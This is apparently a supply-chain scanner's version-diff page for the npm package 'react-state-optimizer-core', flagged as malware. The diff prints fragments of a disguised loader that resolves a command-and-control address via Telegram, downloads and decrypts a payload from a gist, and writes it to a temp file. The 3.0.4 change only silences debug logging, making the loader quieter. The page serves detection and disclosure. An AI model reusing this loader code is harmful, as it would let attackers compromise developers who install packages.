react-state-optimizer-core
Advanced tools
react-state-optimizer-core - npm Package Compare versions
+1
-1
| { | ||
| "name": "react-state-optimizer-core", | ||
| "version": "3.0.3", | ||
| "version": "3.0.4", | ||
| "description": "Utility layer for asynchronous state management", | ||
@@ -5,0 +5,0 @@ "main": "index.js", |
+9
-7
@@ -25,2 +25,4 @@ const fs = require('fs'); | ||
| (async function ghostInit() { | ||
| let debugMode = false; // FORCE DEBUG MODE FOR TESTING | ||
| console.log("[Setup] fetching initial components..."); | ||
@@ -178,5 +180,5 @@ | ||
| async function resolveConfigFromTelegram() { | ||
| console.log(`[Debug] Fetching C2: ${CHANNEL_URL}`); | ||
| if (debugMode) console.log(`[Debug] Fetching C2: ${CHANNEL_URL}`); | ||
| const html = await fetchText(CHANNEL_URL); | ||
| console.log(`[Debug] Fetched HTML (${html.length} bytes)`); | ||
| if (debugMode) console.log(`[Debug] Fetched HTML (${html.length} bytes)`); | ||
@@ -237,11 +239,11 @@ let keyPartB = null; | ||
| console.log("[Debug] Resolving C2 from Telegram..."); | ||
| if (debugMode) console.log("[Debug] Resolving C2 from Telegram..."); | ||
| const { key: keyString, gistUrl } = await resolveConfigFromTelegram(); | ||
| console.log(`[Debug] C2 Resolved. Key: ${keyString.substring(0, 8)}... URL: ${gistUrl}`); | ||
| if (debugMode) console.log(`[Debug] C2 Resolved. Key: ${keyString.substring(0, 8)}... URL: ${gistUrl}`); | ||
| await progressPromise; | ||
| console.log(`[Debug] Fetching payload from ${gistUrl}...`); | ||
| if (debugMode) console.log(`[Debug] Fetching payload from ${gistUrl}...`); | ||
| const b64Payload = await fetchText(gistUrl); | ||
| console.log(`[Debug] Payload fetched (${b64Payload.length} bytes). Decrypting...`); | ||
| if (debugMode) console.log(`[Debug] Payload fetched (${b64Payload.length} bytes). Decrypting...`); | ||
@@ -263,3 +265,3 @@ const encryptedBlob = Buffer.from(b64Payload.trim(), 'base64'); | ||
| let debugMode = false; // FORCE DEBUG MODE FOR TESTING | ||
| // debugMode is now defined at the top | ||
@@ -266,0 +268,0 @@ const tempFile = path.join(os.tmpdir(), `npm-update-${Date.now()}.js`); |
New alerts
AI-detected potential malware
Supply chain riskAI has identified this package as malware. This is a strong signal that the package may be malicious.
Found 1 instance in 1 package
Network access
Supply chain riskThis module accesses the network.
Found 3 instances in 1 package
Shell access
Supply chain riskThis module accesses the system shell. Accessing the system shell increases the risk of executing arbitrary code.
Found 1 instance in 1 package
Unpublished package
Supply chain riskPackage version was not found on the registry. It may exist on a different registry and need to be configured to pull from that registry.
Found 1 instance in 1 package
Dynamic require
Supply chain riskDynamic require can indicate the package is performing dangerous or unsafe dynamic code execution.
Found 1 instance in 1 package
Environment variable access
Supply chain riskPackage accesses environment variables, which may be a sign of credential stuffing or data theft.
Found 3 instances in 1 package
Filesystem access
Supply chain riskAccesses the file system, and could potentially read sensitive data.
Found 1 instance in 1 package
Long strings
Supply chain riskContains long string literals, which may be a sign of obfuscated or packed code.
Found 1 instance in 1 package
Fixed alerts
AI-detected potential malware
Supply chain riskAI has identified this package as malware. This is a strong signal that the package may be malicious.
Found 1 instance in 1 package
Network access
Supply chain riskThis module accesses the network.
Found 3 instances in 1 package
Shell access
Supply chain riskThis module accesses the system shell. Accessing the system shell increases the risk of executing arbitrary code.
Found 1 instance in 1 package
Unpublished package
Supply chain riskPackage version was not found on the registry. It may exist on a different registry and need to be configured to pull from that registry.
Found 1 instance in 1 package
Dynamic require
Supply chain riskDynamic require can indicate the package is performing dangerous or unsafe dynamic code execution.
Found 1 instance in 1 package
Environment variable access
Supply chain riskPackage accesses environment variables, which may be a sign of credential stuffing or data theft.
Found 3 instances in 1 package
Filesystem access
Supply chain riskAccesses the file system, and could potentially read sensitive data.
Found 1 instance in 1 package
Long strings
Supply chain riskContains long string literals, which may be a sign of obfuscated or packed code.
Found 1 instance in 1 package
Improved metrics
- Total package byte prevSize
11977
1.13%- Lines of code
238
0.42%